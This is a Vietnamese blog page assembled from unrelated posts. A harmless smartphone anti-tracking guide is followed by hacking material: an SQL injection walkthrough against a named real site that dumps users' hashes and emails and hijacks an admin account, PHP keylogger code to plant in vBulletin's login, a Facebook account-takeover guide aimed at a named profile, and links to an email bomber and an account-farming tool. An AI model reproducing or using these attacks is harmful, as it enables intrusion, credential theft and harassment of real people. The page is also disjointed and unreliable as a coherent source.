Latest Post

Định vị GPS, tài khoản cá nhân, phần mềm gián điệp... là những công cụ có thể tiếp tay cho người khác bí mật theo dõi vị trí hoặc nghe lén những cuộc gọi riêng tư.
Hạn chế sử dụng dịch vụ định vị
Dịch vụ định vị dựa trên GPS, dữ liệu di động (3G/4G LTE) và Wi-Fi mang lại nhiều tiện lợi cho người dùng smartphone, chẳng hạn như tìm đường đi trên Google Maps, tìm cửa hàng ăn uống trên Foursquare, gắn địa điểm Facebook... Tuy nhiên, việc chiếc smartphone theo dõi từng đường đi nước bước của người dùng cũng tiềm ẩn những rủi ro.
5 cách tránh bị theo dõi lén qua smartphone
Dịch vụ định vị là cánh tay đắc lực cho những phần mềm theo dõi. Ảnh: iMoore.  
Đối với iPhone và các thiết bị iOS nói chung, người dùng cần kiểm tra lại thiết lập định vị bằng cách vào Settings/General/Restrictions. Tại mục này, người dùng nhập mã bảo vệ để bật tính năng giới hạn (Restrictions), sau đó tìm mục Location Services. Tại mục này, bạn có thể tắt hẳn dịch vụ định vị hoặc bật lại.  
Tiếp theo, người dùng cần quan sát trong danh sách liệt kê các ứng dụng đang dùng định vị. Với người dùng thông thường, chỉ cần các ứng dụng quan trọng như Google Maps, Here Maps, các ứng dụng đặt taxi, Foursquare... cần đến định vị. Các game, ứng dụng không cần thiết nếu vẫn được cấp quyền, bạn cần thay đổi lại tuỳ chọn của chúng cho phù hợp. Có ba mức mà bạn có thể chọn cho mỗi ứng dụng: Always (luôn luôn), While Using (chỉ khi chạy ứng dụng), hoặc Never (không cho sử dụng định vị).
Trên Android, tuy các hãng sử dụng giao diện khác nhau, nhưng người dùng có thể tìm mục cài đặt (Settings), chọn Privacy and Safety Location, mục Location. Tại đây, người dùng cũng được cung cấp tuỳ chọn tắt dịch vụ định vị, tuỳ chọn cách thức định vị hoặc cấp quyền truy cập vào vị trí cho các ứng dụng chạy nền.  
Không root máy hoặc jailbreak 
Root máy Android hoặc jaibreak iPhone mang đến những trải nghiệm lạ, nhưng đi kèm với đó là hàng tá các rủi ro. Thiết bị sau khi bị root hoặc jailbreak đều rất kém ổn định và không an toàn, dễ bị người khác lén cài ứng dụng theo dõi trái phép vào máy. 
5 cách tránh bị theo dõi lén qua smartphone
Máy đã root hoặc jailbreak là môi trường lý tưởng cho các ứng dụng theo dõi lén. Ảnh:Titml.
Tuy nhiên, với những người dùng thông thạo, họ có thể jailbreak hoặc root máy để cài các ứng dụng giả lập địa điểm giả, giúp chủ nhân "giả vờ" như đang ở chỗ này, nhưng trên thực tế họ ở một nơi khác.
Rà soát lại các ứng dụng lạ
Nếu máy đã root hoặc jailbreak và người làm điều đó là người thân, bạn bè của bạn thì hãy... cẩn thận. Trong đa số trường hợp, việc người khác giúp đỡ bạn root hoặc jailbreak máy là nhằm cài đặt một tiện ích vô hại nào đó, nhưng trong một vài trường hợp đặc biệt, smartphone sẽ bị cài phần mềm theo dõi. 
Khi đó, người dùng cần rà soát lại toàn bộ các ứng dụng đã cài đặt và nên gỡ bỏ những cái tên khả nghi. Thực tế, một số ứng dụng theo dõi tinh vi thường ẩn mình trong những cái tên và biểu tượng trông rất vô hại. 
Kiểm tra quyền của ứng dụng khi cài đặt
Khi cài đặt một ứng dụng, người dùng thường được yêu cầu cấp quyền cho phần mềm sử dụng camera, micro thu âm, vị trí... và thông tin đăng nhập, tài khoản... Việc của bạn là "soi" kĩ trước khi cài đặt bất kỳ ứng dụng nào, để tránh việc cấp những quyền vô lý, chẳng hạn như quyền được truy cập vào micro, camera, cho một tựa game cơ bản.
Không chia sẻ tài khoản thiết bị
Nhiều người dùng rất bất cẩn trong việc quản lý tài khoản của mình trên smartphone, tablet. Đây là một thực tế khó thay đổi. Tại Việt Nam, nhiều người dùng vẫn dùng chung Apple ID với cửa hàng bán điện thoại. Nhiều người dùng nữ "hồn nhiên" cung cấp Apple ID, tài khoản iCloud cho người yêu và không ngờ mình bị theo dõi qua tính năng Find My iPhone. 
Không chỉ trên iPhone, người dùng Android cũng không nên dễ dãi với tài khoản của mình. Gmail là thứ quý giá nhất trên thiết bị Android bởi nó lưu trữ danh bạ, email, ghi chú... và là chìa khoá đăng nhập vào các dịch vụ lưu trữ ảnh. Nếu người khác biết Gmail và mật khẩu của bạn, họ cũng có thể định vị được bạn đang ở đâu nếu trước đó đã bật tính năng tìm thiết bị khi bị mất. 
Bên cạnh việc giữ kỹ tài khoản cá nhân, người dùng cần hạn chế sử dụng các tính năng stream photo đến các thiết bị khác, chẳng hạn như một chiếc iPhone có thể tự động gửi ảnh vừa chụp đến bộ sưu tập ảnh trên iPad. Một chiếc smartphone Android tự đồng bộ ảnh lên Google Photos và người nào đó biết mật khẩu đăng nhập vào dịch vụ này. Đây là một tiện ích và cũng là con dao hai lưỡi.



Đầu tiên, tất nhiên là SQL Injection rồi. Để cho dễ, tớ xài vul trong com_simcategories (Xem bài:[Joomla] Com_simcategories dính lỗi sqli)

OK, giả sử victim là thằng này:
http://dienthoainamanh.com/index.php?option=com_simcategories&view=simcategories&id=4
Giờ thì chèn SQL injection thôi
http://dienthoainamanh.com/index.php?option=com_simcategories&view=simprovider&id=-1′%20UNION%20SELECT%201,group_concat(username,0x7c,password,0x7c,email),3,4,5,6,7%20from%20jos_users–%20-
Ta có gì nào:
asuamin|053550db385f39b7d78ab931a85631df:I95zJo2Sx2kR2PElEhIlWVZsWZm98ZQ7|vanhuyenpc@gmail.com,namanh|7ecb6c26dc2422ab825817bf7d97d923:eT6gDqPs6c6rDcOHT9CVNK4wfzQoVGQp|dienthoai.namanh@gmail.com
Password và salt kiểu này crack tới mãn kiếp quá :’( 053550db385f39b7d78ab931a85631df:I95zJo2Sx2kR2PElEhIlWVZsWZm98ZQ7
Giỡn thôi, giờ thì tìm trang reset password nha
http://dienthoainamanh.com/index.php?option=com_user&view=reset
Điền vào email ở trên: vanhuyenpc@gmail.com và nhấn nút
Xong, lại tiếp tục sql injection. Mục đích là lấy activation key
http://dienthoainamanh.com/index.php?option=com_simcategories&view=simprovider&id=-1′%20UNION%20SELECT%201,group_concat(username,0x7c,activation,0x7c,email),3,4,5,6,7%20from%20jos_users–%20-
Điền cái activation vào khung => OK => nhập password mới và làm gì tiếp theo thì….xin hẹn bài sau ^^

Demo: 


Tut:Khi đã có shell trên forum mở file login.php của nó ra tìm đoạn
process_new_login(($_postvars['logintype'] 
Chèn bên dưới 
 //=== Keyloger vbb4x, fix by anything1712 =================
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];

// The log will be recorded in this file
$lg_file = "modcp/test.html";

$sql_query = @mysql_query("SELECT * FROM `" . TABLE_PREFIX . "user` WHERE username='" . $lg_username . "'");

while($row = @mysql_fetch_array($sql_query)) {
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) {
$logfile = @file($lg_file);
$logfile[] = $lg_username . " : " . $lg_password." (" . $row["email"] . ")";
$logfile = array_unique($logfile);

$fp1 = fopen($lg_file, "w");
fwrite($fp1, implode("\r\n", $logfile));
fclose($fp1);
}
break;
}
//==============================
Trong đó $lg_file = "modcp/test.html"; chỉnh lại đường dẫn đến file muốn lưu sau đó tìm file clientscript/vbulletin_md5.js mở nó ra tìm đoạn 
B.value=""
Thường là nó nằm ở cuối file

sửa lại thành

B.value=B.value
Done đợi victim đăng nhập và tận hưởng thành quả 

Read more: http://www.votam.ug/search/label/Hacking-Security#ixzz3obKILKxx

Hôm nay rảnh rồi ngồi viết 1 ít phương pháp check nick fb hiện nay mà 1 số người vẫn hay dùng để check nick.Topic này mình viết nhằm mục đích cho ae hiểu được cơ cấu của các phương pháp check mà phòng tránh nhé chứ ko phải khuyên các bạn sử dụng các phương pháp trên để check nick người khác
-Phương pháp 1: Kĩ thuật phishing
Chắc nhiều anh em trong VHB mình cũng biết phishing là gì nhỉ (Nó là 1 dạng website fake của 1 website nào đó nhằm lừa victim để lấy account hoặc info cá nhân. Các coder chỉ cần rip code về và thêm 1 hàm php lưu logs hoặc send mail thì đối với những ai ko biết rõ về phương pháp này sẽ rất dễ bị mắc bẫy
Demo: http://phucnguyen.tv/fb.php RIP giao diện fb và giờ đã bị FB cảnh báo rồi
-Phương Pháp 2:Là kĩ thuật đoán câu trả lời bảo mật
Phương pháp này gọi là đoán pass thần chưởng mà dân hacker chúng ta hay gọi. Để check 1 nick mà khi nick đó yêu cầu câu trả lời bảo mật thì nếu gặp những câu hỏi dễ mà dễ đoán như: Mẹ bạn quê ở đâu?, Bạn sinh ra ở TP nào... thì trước khi trả lời thì chúng ta cũng cố gắng tìm hiểu info của victim cái đã. Nếu victim để tôàn bộ info của mình lên wall cá nhân thì cơ hội đoán pass thần chưởng của chúng ta sẽ có xác suất 9 xác rất cao. Còn gặp các câu hỏi Giao viên chủ nhiệm, hay lớp 1 bạn học ở đâu thì có lẽ sẽ hơi khó đoán. Nói chung phương pháp này nhờ may mắn :)

 Phương pháp 3: Là Phương Pháp Dùng 3 Bạn bè để lấy lại account
Phương pháp này trước khi bị fb fix 1 time thì phương pháp này khá phổ biến đối với những ai hay check nick như Thi Gia-GhostTeam. Đến thời điểm hiện nay thì FB đã fix bảo mật là dùng 3 bạn bè xác minh thì phải đợi 24h sau nếu ko ai tranh chấp thì mới đc change pass mới
Ở đây method 3 friend là gì: Là phương pháp nhờ 3 bạn bè của victim lấy lại nick với tư cách khi mình chọn 3 bạn bè đó thì fb sẽ tự động gửi về 1 đoạn mã code xác minh và 3 bạn này nhập mã vào nếu xác minh thành công thì sẽ đợi 24h sau. ( Trước khi bị fix thì Thi Gia sử dụng Phương Pháp này và dùng thêm 3 acc clone add friend vs victim sau đó rồi tiến hành check nick.Khi check chọn 3 acc clone để fb gửi về. chứ ko nếu chọn bừa bạn của victim thì mĩnh sẽ ko có đoạn code để xác minh vì thế sẽ ko check nick đc)

 Và đây mình sẽ hướng dẫn các bạn bảo mật để không bị check nick bằng phương pháp này
-Đầu tiên các bạn vào Thiết Lập-->Bảo mật--> Sổ liên lạc đáng tin cậy ( các bạn chọn 3 friend tùy muốn để sau này nếu có bị mất nick thì mình cũng nhớ 3 bạn bè mà mình đã chọn. Đối vs cách chọn như thế thì attacker muốn check nick bạn cũng ko thể đoán đc 3 friend bạn chọn là ai)

-----------------------------------------------------------------------------------------------
Hướng dẫn mọi người forgot pass khi ko nhớ email hoặc email của victim đã bị ẩn
Ở đây mình dùng bạn này để làm victim: https://www.facebook.com/zMrTen?fref=ts
info của bạn ấy hoàn toàn ko có gì nhưng ko sao. Các bạn cứ vào fb.com sau đó bấm quên mật khẩu. Tiếp theo các bạn ko có email thì có thể dùng username của người này để forgot cũng đc: zMrTen và cuối cùng sẽ hiện ra thế này

  Mình hoàn toàn ko có 1 info bất kì nào của victim thì các bạn bấm vào dòng text: Không còn truy cập đc nữa để sử dụng method thứ 2 và thứ 3 như mình đã nói nhé.
P/s: Bài viết này mình viết giúp các bạn hiểu và có kinh nghiệm để phòng tránh! Nếu cảm thấy hay thì like cho mình phát nhé

Ko biết còn ai cần ko vì bh các pro đều đã có, ai chưa có thì dùng nhé.
Mình để mặc định là khi nhấn boom xong mail sẽ gửi, ko ước tính đc mail sẽ gửi là bao nhiêu... khi nào ko muốn gửi nữa nhấn stop. Có thể sửa đi cho dễ, nhưng mềnh ko quan trọng, cứ đầy mail nó là đc.
Download:http://www.mediafire.com/?bjrs8x2adilp8cc
  Site test:
http://bwvn.evnport.com/sanpham/boom.php


Cái này thích hợp cho bạn nào thi thoảng mới check một vài em , chứ fun 1$ vào ltbvn là có cre check thoải mái rồi

Đê mô :



Source : Autoit
ko phải autoit là toàn về virus đâu nhé
Hướng dẫn :
+ Mở tool lên chuyển qa tab Create Account
+ Ấn button Generate để tự động điền info - rồi điền captcha và create thôi
+ Chuyển qa tab Login ấn button Input thì nó tự động điền cái username và pass lúc nãy vào - điền captcha và đăng nhập !
Cứ như vậy khi nào hết credits , logout rồi qa tab Create Account tạo tiếp và check
Link Down : http://www.mediafire.com/?cct333xb7rvt9kc
Đừng đáp gạch em nhé

Update Source : http://www.mediafire.com/?4iszh79od2q771x
( Nhìn source là biết gà )
Update chức năng : Hide và Show
* Ctrl + Shift + H : Hide tool
* Ctrl + Shift + S : Show Tool
Khi nào sài xong thì hide tool cần thì show rồi check tiếp

*New Update :
+Fix lỗi Input tài khoản, ổn định hơn
+Tài khoản đã reg sẽ lưu vào file test.txt cùng file với thư mục .exe
1 phút reg khoảng 10-15 nick )
http://www.mediafire.com/?x5187vu1g5op392
(Gồm source và .exe ! )

Author Name

{picture#YOUR_PROFILE_PICTURE_URL} YOUR_PROFILE_DESCRIPTION {facebook#YOUR_SOCIAL_PROFILE_URL} {twitter#YOUR_SOCIAL_PROFILE_URL} {google#YOUR_SOCIAL_PROFILE_URL} {pinterest#YOUR_SOCIAL_PROFILE_URL} {youtube#YOUR_SOCIAL_PROFILE_URL} {instagram#YOUR_SOCIAL_PROFILE_URL}

Biểu mẫu liên hệ

Tên

Email *

Thông báo *

Được tạo bởi Blogger.